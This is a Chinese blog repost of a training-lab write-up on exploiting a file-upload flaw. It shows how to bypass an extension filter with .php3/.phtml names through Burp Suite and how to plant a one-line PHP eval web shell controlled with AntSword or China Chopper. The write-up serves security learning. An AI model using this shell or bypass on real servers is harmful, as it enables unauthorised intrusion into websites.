文件上传漏洞—简单利用(墨者学院靶场)

本文阅读 3 分钟

文件上传漏洞—简单利用(墨者学院靶场)

说明:文章中涉及的网站信息皆是墨者学院靶场环境,不涉及互联网真实环境,仅供学习。

信息收集:

访问目标靶场地址,得到如下界面,根据google插件Aappalyzer判断目标靶场信息: Web容器:Apache 脚本语言:PHP 操作系统:Ubuntu(linux)

测试过程:

img 1,根据功能点判断此处可能存在文件上传漏洞,尝试上传扩展名为txt和php的文件,发现扩展名为txt的文件可以正常上传,但是php后缀的文件上传失败 img 2,上传文件poc.txt,使用Burpsuite代理工具抓包尝试修改content-Disposition请求头的filename字段为filename=poc.php尝试上传,文件上传失败,判断网站服务端对扩展名做了限制(前端绕过) img 3,判断目标靶场的Web容器为Apache,使用Burpsuite代理工具抓包尝试修改content-Disposition请求头的filename字段为poc.php3尝试上传,文件上传成功,同时目标靶场回显文件存储路径 img

img

4,重新编辑poc.txt文件,编辑内容为一句话木马<?php @eval($_POST['x']); ?>,使用蚁剑或中国菜刀连接,发现连接成功,获取到目标靶场的Web网站目录

img 目标靶场目录: img

注意点:

1,一句话木马中的eval()函数也可以更换为assert()函数等,作用都是将里面的字符串当作代码执行,同时$_POST()函数也要根据具体情况更换为$_GET()和$_REQUEST(),三者区别可参考文章 三者区别。 2,除了poc.php3,也可以将文件修改为php4,php5,phtml,pht,此原因是因为Apache会将上述扩展名当作php扩展去执行 3,蚁剑可以通过一句话木马连接到Web网站,其原理就是 通过一句话木马中的"X"参数写入代码,通过代码执行来实现的。

总结:

虽然这个案例是一个很简单的案例,但是学习思路最为重要,当我们拿到目标靶场的时候,应该从信息收集开始,一步一步进行渗透,每个漏洞都应该及时总结出他的大致思路,及时总结。

文章涉及知识点:

1, PHP代码—变量$_RGQUEST,$_GET,$_POST和$_COOKIE 2, Web安全—文件上传漏洞 3,工具蚁剑的安装和简单使用

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/weixin_44431280/article/details/123118329
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复